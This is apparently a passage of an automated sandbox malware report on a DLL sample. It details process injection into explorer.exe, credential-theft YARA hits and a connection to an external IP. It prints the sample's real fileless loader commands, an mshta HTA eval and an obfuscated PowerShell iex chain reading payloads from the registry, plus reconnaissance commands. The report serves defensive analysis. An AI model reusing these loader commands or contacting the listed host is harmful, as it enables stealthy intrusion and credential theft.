Source: RuntimeBroker.exe, 00000037.00000000.706806325.000002481183F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000000.586255022.000000000807C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000I
Source: mshta.exe, 00000012.00000003.454449397.0000023DBE606000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: explorer.exe, 0000001D.00000000.586255022.000000000807C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: RuntimeBroker.exe, 00000027.00000002.888309111.000002BFD4858000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: XInput_{74cfb8af-f714-4a10-bf9a-dde4f65eecfb}osoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000000.577232100.00000000042EE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q^
Source: RuntimeBroker.exe, 0000002E.00000002.886858885.000001EF33813000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}te\
Source: explorer.exe, 0000001D.00000000.577016064.00000000042A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000O

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DDFCC0 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	4_2_05DDFCC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DDCE21 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	4_2_05DDCE21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DD5A14 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	4_2_05DD5A14

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_05DDA513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_05DDA513

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_05DDBE55 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

4_2_05DDBE55

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 146.70.35.138 80

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\System32\control.exe base: 9E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: 26F0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 28A77490000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2BFD4780000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EF337F0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 243733B0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 34F0000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 424A1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 424A1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 424A1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 424A1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 424A1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 424A1580

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF76AD312E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 9E0000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF76AD312E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 5E9000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFF424A1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 26D0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFF424A1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 5EB000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFF424A1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 26F0000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFF424A1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF60BDC5FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 28A77490000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF60BDC5FD0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: F57F0B7000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2BFD4780000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7EEC376000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EF337F0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 4F8001A000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 243733B0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: F658FEC000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: EE6FC0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 34F0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: EE6FC0

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFF424A1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFF424A1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFF424A1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFF424A1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFF424A1580 protect: page execute read

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3688 base: 5E9000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3688 base: 7FFF424A1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3688 base: 26D0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3688 base: 7FFF424A1580 value: 40	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3688 base: 5EB000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3688 base: 7FFF424A1580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3688 base: 26F0000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3688 base: 7FFF424A1580 value: 40

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 6468	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3688	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3688
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3932
Source: C:\Windows\explorer.exe	Thread register set: target process: 4504
Source: C:\Windows\explorer.exe	Thread register set: target process: 4712
Source: C:\Windows\explorer.exe	Thread register set: target process: 2880
Source: C:\Windows\explorer.exe	Thread register set: target process: 6660

Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qq47='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qq47).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ffrhac -value gp; new-alias -name ulgwgd -value iex; ulgwgd ([System.Text.Encoding]::ASCII.GetString((ffrhac "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ffrhac -value gp; new-alias -name ulgwgd -value iex; ulgwgd ([System.Text.Encoding]::ASCII.GetString((ffrhac "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\d6YCUW421p.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ffrhac -value gp; new-alias -name ulgwgd -value iex; ulgwgd ([System.Text.Encoding]::ASCII.GetString((ffrhac "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vqkyohgm\vqkyohgm.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\g2letrfe\g2letrfe.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5B2D.tmp" "c:\Users\user\AppData\Local\Temp\vqkyohgm\CSCBF795D6899604BF9A48E638AB671C4FD.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71E1.tmp" "c:\Users\user\AppData\Local\Temp\g2letrfe\CSC71DE0290BB9F401583CAD01729BF75D7.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: explorer.exe, 0000001D.00000000.530005367.00000000058B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.582199033.00000000058B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.520700422.0000000000D70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001D.00000000.520700422.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.569554059.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.573049423.0000000000D70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001D.00000000.520700422.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.573049423.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.522362138.0000000000D70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001D.00000000.520700422.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.573049423.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.522362138.0000000000D70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_04AB12D3 cpuid

4_2_04AB12D3

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_04AB5410 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

4_2_04AB5410

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_04AB12D3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

4_2_04AB12D3

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_05DD4DF5 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

4_2_05DD4DF5

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_04AB515F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

4_2_04AB515F

Stealing of Sensitive Information

Tries to steal Mail credentials (via file / registry access)

Source: Yara match	File source: 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436099354.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742734831.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.610002032.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.508252073.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387911041.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387848554.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.606984804.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.609139128.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.743014164.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387690686.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742810151.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.607160802.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388080339.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742565489.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742635161.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388156099.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387614709.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.433046999.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388142124.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.438809080.000000000542C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.743129288.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742454861.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742926350.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.504617331.000001985CADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.508411466.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387950801.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.744378617.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.594123395.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.491794343.0000000006378000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742968366.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 2880, type: MEMORYSTR
Source: Yara match	File source: 4.3.rundll32.exe.4e394a0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4e394a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55d6940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55d6940.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.552a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.552a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000000.604999946.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.507197742.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.741896221.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.667078163.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.741217358.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.703035684.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.622907247.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.564167327.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.504046961.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.686963959.0000019853F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.569771687.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436035470.00000000055A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
